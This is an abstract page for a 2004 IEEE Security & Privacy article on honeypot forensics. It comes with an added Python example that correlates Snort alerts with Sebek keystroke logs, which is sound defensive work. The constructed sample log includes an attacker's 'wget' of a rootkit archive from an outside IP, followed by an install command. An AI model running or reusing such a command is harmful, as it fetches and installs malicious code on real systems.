Issue No.04 - July-August (2004 vol.2)
Yann Berthier, Hervé Schauer Consultants
Frederic Raynal, MISC Magazine
Danielle Kaminsky, TEGAM International
DOI Bookmark: http://doi.ieeecomputersociety.org/10.1109/MSP.2004.47
A major goal of honeypot research is to improve our knowledge of blackhats from two perspectives: technical and ethnological. For the former, we want new ways to discover rootkits, trojans, and potential zero-day exploits (although capturing zero-day exploits in a honeypot is an unusual event). For the latter, we want a better understanding of the areas of interest and hidden links between blackhat teams. One way to achieve these goals is to increase the verbosity of our honeypot logs and traces; the most common tools for doing this are Sebek (http://project.honeynet.org/tools/sebek/) for system events and Snort (www.snort.org) for network activity. Unfortunately, there is no easy way to correlate information from these sources, which complicates honeypot forensics.
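The correlation problem the abstract raises, as an added example that is not code from the paper or from the Sebek or Snort projects: join Snort alerts to the keystrokes Sebek captured on the honeypot they targeted, keyed on the alert's destination IP and a short time window after the alert. The Snort line layout is Snort's alert_fast output; because that format carries no year, the year is assumed. The Sebek line layout is an assumed, simplified rendering of a Sebek record (timestamp, honeypot IP, PID, UID, command name, captured data) and must be adapted to whatever your collector actually writes. All sample lines are constructed.

```python
"""Correlate Snort alert_fast lines with Sebek keystroke records by host + time window.

Added example, not the paper's code. The Sebek line format below is an
assumption (a simplified text rendering of a Sebek record); parse_sebek()
is the only place that needs changing for a real collector's output.
"""
import re
from datetime import datetime, timedelta

# Snort alert_fast timestamps have no year; assume one (assumption of this example).
YEAR = 2004

SNORT_RE = re.compile(
    r"^(?P<ts>\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+\[\*\*\]\s+"
    r"\[(?P<gid>\d+):(?P<sid>\d+):(?P<rev>\d+)\]\s+(?P<msg>.+?)\s+\[\*\*\]"
    r"(?:\s+\[Classification:\s*(?P<cls>[^\]]*)\])?"
    r"(?:\s+\[Priority:\s*(?P<prio>\d+)\])?"
    r"\s+\{(?P<proto>\w+)\}\s+(?P<src>[\d.]+)(?::(?P<sport>\d+))?\s+->\s+"
    r"(?P<dst>[\d.]+)(?::(?P<dport>\d+))?\s*$"
)

# Assumed Sebek line layout (constructed for this example):
#   [YYYY-MM-DD HH:MM:SS] host=<ip> pid=<n> uid=<n> com=<name> data=<text>
SEBEK_RE = re.compile(
    r"^\[(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d)\]\s+host=(?P<host>[\d.]+)\s+"
    r"pid=(?P<pid>\d+)\s+uid=(?P<uid>\d+)\s+com=(?P<com>\S+)\s+data=(?P<data>.*)$"
)

# Constructed sample data: one inbound SSH alert against honeypot 192.168.1.2,
# one unrelated alert, then keystrokes seen on two honeypots. SIDs are local
# (>= 1000000) placeholders, not real rule IDs.
SNORT_SAMPLE = [
    "07/15-12:00:01.123456  [**] [1:1000001:1] SSH brute force login attempt [**] "
    "[Classification: Attempted Administrator Privilege Gain] [Priority: 1] "
    "{TCP} 10.0.0.7:41022 -> 192.168.1.2:22",
    "07/15-12:30:00.000000  [**] [1:1000002:1] Outbound IRC connection [**] "
    "[Priority: 3] {TCP} 192.168.1.3:1025 -> 10.0.0.9:6667",
]
SEBEK_SAMPLE = [
    "[2004-07-15 12:00:05] host=192.168.1.2 pid=2314 uid=0 com=bash data=id",
    "[2004-07-15 12:00:09] host=192.168.1.2 pid=2314 uid=0 com=bash data=wget http://10.0.0.7/rk.tgz",
    "[2004-07-15 12:05:00] host=192.168.1.2 pid=2314 uid=0 com=bash data=./install",
    "[2004-07-15 12:00:07] host=192.168.1.3 pid=800 uid=1000 com=sh data=ls",
]


def parse_snort_fast(line):
    """Parse one Snort alert_fast line into a dict; return None if it does not match."""
    m = SNORT_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(f"{YEAR}/{m['ts']}", "%Y/%m/%d-%H:%M:%S.%f")
    return {"ts": ts, "sid": int(m["sid"]), "msg": m["msg"], "proto": m["proto"],
            "src": m["src"], "dst": m["dst"],
            "dport": int(m["dport"]) if m["dport"] else None}


def parse_sebek(line):
    """Parse one Sebek line in the assumed layout into a dict; None if it does not match."""
    m = SEBEK_RE.match(line.strip())
    if not m:
        return None
    return {"ts": datetime.strptime(m["ts"], "%Y-%m-%d %H:%M:%S"), "host": m["host"],
            "pid": int(m["pid"]), "uid": int(m["uid"]), "com": m["com"], "data": m["data"]}


def correlate(snort_lines, sebek_lines, window=60):
    """For each alert, collect Sebek records on the alert's destination host captured
    within `window` seconds after the alert. This is the simplest possible join
    (destination IP == honeypot IP, plus a time window); on a busy honeypot it will
    over-match, so keep the window short and review the result by hand."""
    alerts = [a for a in map(parse_snort_fast, snort_lines) if a]
    records = sorted((r for r in map(parse_sebek, sebek_lines) if r), key=lambda r: r["ts"])
    out = []
    for a in alerts:
        end = a["ts"] + timedelta(seconds=window)
        hits = [r for r in records if r["host"] == a["dst"] and a["ts"] <= r["ts"] <= end]
        out.append({"alert": a, "activity": hits})
    return out


if __name__ == "__main__":
    for item in correlate(SNORT_SAMPLE, SEBEK_SAMPLE):
        a = item["alert"]
        print(f"{a['ts']} sid={a['sid']} {a['src']} -> {a['dst']} : {a['msg']}")
        for r in item["activity"]:
            print(f"    {r['ts']} pid={r['pid']} uid={r['uid']} {r['com']}: {r['data']}")
```

On the sample data the SSH alert picks up the `id` and `wget` keystrokes that follow it within a minute on 192.168.1.2, while `./install` (four minutes later) and the activity on 192.168.1.3 are left out. The clocks of the Sebek client and the Snort sensor must be synchronized for a join like this to mean anything; NTP on the sensor and on the honeypot is the practical prerequisite, and the window has to be widened to cover any residual skew.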
honeynets, honeypots, blackhat
Yann Berthier, Frederic Raynal, Danielle Kaminsky, "Honeypot Forensics Part I: Analyzing the Network", IEEE Security & Privacy, vol.2, no. 4, pp. 72-78, July-August 2004, doi:10.1109/MSP.2004.47